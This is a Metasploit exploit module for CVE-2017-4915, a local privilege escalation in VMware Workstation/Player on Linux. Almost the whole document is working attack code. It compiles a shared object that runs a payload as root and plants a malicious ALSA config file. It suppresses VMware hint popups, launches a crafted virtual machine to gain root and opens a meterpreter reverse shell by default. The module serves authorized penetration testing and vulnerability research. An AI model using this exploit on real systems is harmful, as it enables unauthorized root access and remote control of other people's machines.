VMware Workstation ALSA Config File Local Privilege Escalation

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Local  
Rank = ExcellentRanking  
  
include Msf::Exploit::EXE  
include Msf::Post::File  
include Msf::Exploit::FileDropper  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'VMware Workstation ALSA Config File Local Privilege Escalation',  
'Description' => %q{  
This module exploits a vulnerability in VMware Workstation Pro and  
Player on Linux which allows users to escalate their privileges by  
using an ALSA configuration file to load and execute a shared object  
as root when launching a virtual machine with an attached sound card.  
  
This module has been tested successfully on VMware Player version  
12.5.0 on Debian Linux.  
},  
'References' =>  
[  
[ 'CVE', '2017-4915' ],  
[ 'EDB', '42045' ],  
[ 'BID', '98566' ],  
[ 'URL', 'https://gist.github.com/bcoles/cd26a831473088afafefc93641e184a9' ],  
[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2017-0009.html' ],  
[ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1142' ]  
],  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Jann Horn', # Discovery and PoC  
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit  
],  
'DisclosureDate' => 'May 22 2017',  
'Platform' => 'linux',  
'Targets' =>  
[  
[ 'Linux x86', { 'Arch' => ARCH_X86 } ],  
[ 'Linux x64', { 'Arch' => ARCH_X64 } ]  
],  
'DefaultOptions' =>  
{  
'Payload' => 'linux/x64/meterpreter_reverse_tcp',  
'WfsDelay' => 30,  
'PrependFork' => true  
},  
'DefaultTarget' => 1,  
'Arch' => [ ARCH_X86, ARCH_X64 ],  
'SessionTypes' => [ 'shell', 'meterpreter' ],  
'Privileged' => true ))  
register_options [  
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])  
]  
end  
  
def has_prereqs?  
vmplayer = cmd_exec 'which vmplayer'  
if vmplayer.include? 'vmplayer'  
vprint_good 'vmplayer is installed'  
else  
print_error 'vmplayer is not installed. Exploitation will fail.'  
return false  
end  
  
gcc = cmd_exec 'which gcc'  
if gcc.include? 'gcc'  
vprint_good 'gcc is installed'  
else  
print_error 'gcc is not installed. Compiling will fail.'  
return false  
end  
  
true  
end  
  
def check  
unless has_prereqs?  
print_error 'Target missing prerequisites'  
return CheckCode::Safe  
end  
  
begin  
config = read_file '/etc/vmware/config'  
rescue  
config = ''  
end  
  
if config =~ /player\.product\.version\s*=\s*"([\d\.]+)"/  
@version = Gem::Version.new $1.gsub(/\.$/, '')  
vprint_status "VMware is version #{@version}"  
else  
print_error "Could not determine VMware version."  
return CheckCode::Unknown  
end  
  
if @version < Gem::Version.new('12.5.6')  
print_good 'Target version is vulnerable'  
return CheckCode::Vulnerable  
end  
  
print_error 'Target version is not vulnerable'  
CheckCode::Safe  
end  
  
def exploit  
if check == CheckCode::Safe  
print_error 'Target machine is not vulnerable'  
return  
end  
  
@home_dir = cmd_exec 'echo ${HOME}'  
unless @home_dir  
print_error "Could not find user's home directory"  
return  
end  
@prefs_file = "#{@home_dir}/.vmware/preferences"  
  
fname = ".#{rand_text_alphanumeric rand(10) + 5}"  
@base_dir = "#{datastore['WritableDir']}/#{fname}"  
cmd_exec "mkdir #{@base_dir}"  
  
so = %Q^  
/*  
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1142  
Original shared object code by jhorn  
*/  
  
#define _GNU_SOURCE  
#include <stdlib.h>  
#include <string.h>  
#include <stdio.h>  
#include <unistd.h>  
#include <fcntl.h>  
#include <sys/prctl.h>  
#include <err.h>  
  
extern char *program_invocation_short_name;  
  
__attribute__((constructor)) void run(void) {  
uid_t ruid, euid, suid;  
if (getresuid(&ruid, &euid, &suid))  
err(1, "getresuid");  
if (ruid == 0 || euid == 0 || suid == 0) {  
if (setresuid(0, 0, 0) || setresgid(0, 0, 0))  
err(1, "setresxid");  
system("#{@base_dir}/#{fname}.elf");  
_exit(0);  
}  
}  
^  
vprint_status "Writing #{@base_dir}/#{fname}.c"  
write_file "#{@base_dir}/#{fname}.c", so  
  
vprint_status "Compiling #{@base_dir}/#{fname}.o"  
output = cmd_exec "gcc -fPIC -shared -o #{@base_dir}/#{fname}.so #{@base_dir}/#{fname}.c -Wall -ldl -std=gnu99"  
unless output == ''  
print_error "Compilation failed: #{output}"  
return  
end  
  
vmx = %Q|  
.encoding = "UTF-8"  
config.version = "8"  
virtualHW.version = "8"  
scsi0.present = "FALSE"  
memsize = "4"  
ide0:0.present = "FALSE"  
sound.present = "TRUE"  
sound.fileName = "-1"  
sound.autodetect = "TRUE"  
vmci0.present = "FALSE"  
hpet0.present = "FALSE"  
displayName = "#{fname}"  
guestOS = "other"  
nvram = "#{fname}.nvram"  
virtualHW.productCompatibility = "hosted"  
gui.exitOnCLIHLT = "FALSE"  
powerType.powerOff = "soft"  
powerType.powerOn = "soft"  
powerType.suspend = "soft"  
powerType.reset = "soft"  
floppy0.present = "FALSE"  
monitor_control.disable_longmode = 1  
|  
vprint_status "Writing #{@base_dir}/#{fname}.vmx"  
write_file "#{@base_dir}/#{fname}.vmx", vmx  
  
vprint_status "Writing #{@base_dir}/#{fname}.elf"  
write_file "#{@base_dir}/#{fname}.elf", generate_payload_exe  
  
vprint_status "Setting #{@base_dir}/#{fname}.elf executable"  
cmd_exec "chmod +x #{@base_dir}/#{fname}.elf"  
  
asoundrc = %Q|  
hook_func.pulse_load_if_running {  
lib "#{@base_dir}/#{fname}.so"  
func "conf_pulse_hook_load_if_running"  
}  
|  
vprint_status "Writing #{@home_dir}/.asoundrc"  
write_file "#{@home_dir}/.asoundrc", asoundrc  
  
vprint_status 'Disabling VMware hint popups'  
unless directory? "#{@home_dir}/.vmware"  
cmd_exec "mkdir #{@home_dir}/.vmware"  
@remove_prefs_dir = true  
end  
  
if file? @prefs_file  
begin  
prefs = read_file @prefs_file  
rescue  
prefs = ''  
end  
end  
  
if prefs.blank?  
prefs = ".encoding = \"UTF8\"\n"  
prefs << "pref.vmplayer.firstRunDismissedVersion = \"999\"\n"  
prefs << "hints.hideAll = \"TRUE\"\n"  
@remove_prefs_file = true  
elsif prefs =~ /hints\.hideAll/i  
prefs.gsub!(/hints\.hideAll.*$/i, 'hints.hideAll = "TRUE"')  
else  
prefs.sub!(/\n?\z/, "\nhints.hideAll = \"TRUE\"\n")  
end  
vprint_status "Writing #{@prefs_file}"  
write_file "#{@prefs_file}", prefs  
  
print_status 'Launching VMware Player...'  
cmd_exec "vmplayer #{@base_dir}/#{fname}.vmx"  
end  
  
def cleanup  
print_status "Removing #{@base_dir} directory"  
cmd_exec "rm '#{@base_dir}' -rf"  
  
print_status "Removing #{@home_dir}/.asoundrc"  
cmd_exec "rm '#{@home_dir}/.asoundrc'"  
  
if @remove_prefs_dir  
print_status "Removing #{@home_dir}/.vmware directory"  
cmd_exec "rm '#{@home_dir}/.vmware' -rf"  
elsif @remove_prefs_file  
print_status "Removing #{@prefs_file}"  
cmd_exec "rm '#{@prefs_file}' -rf"  
end  
end  
  
def on_new_session(session)  
# if we don't /bin/sh here, our payload times out  
session.shell_command_token '/bin/sh'  
super  
end  
end  
`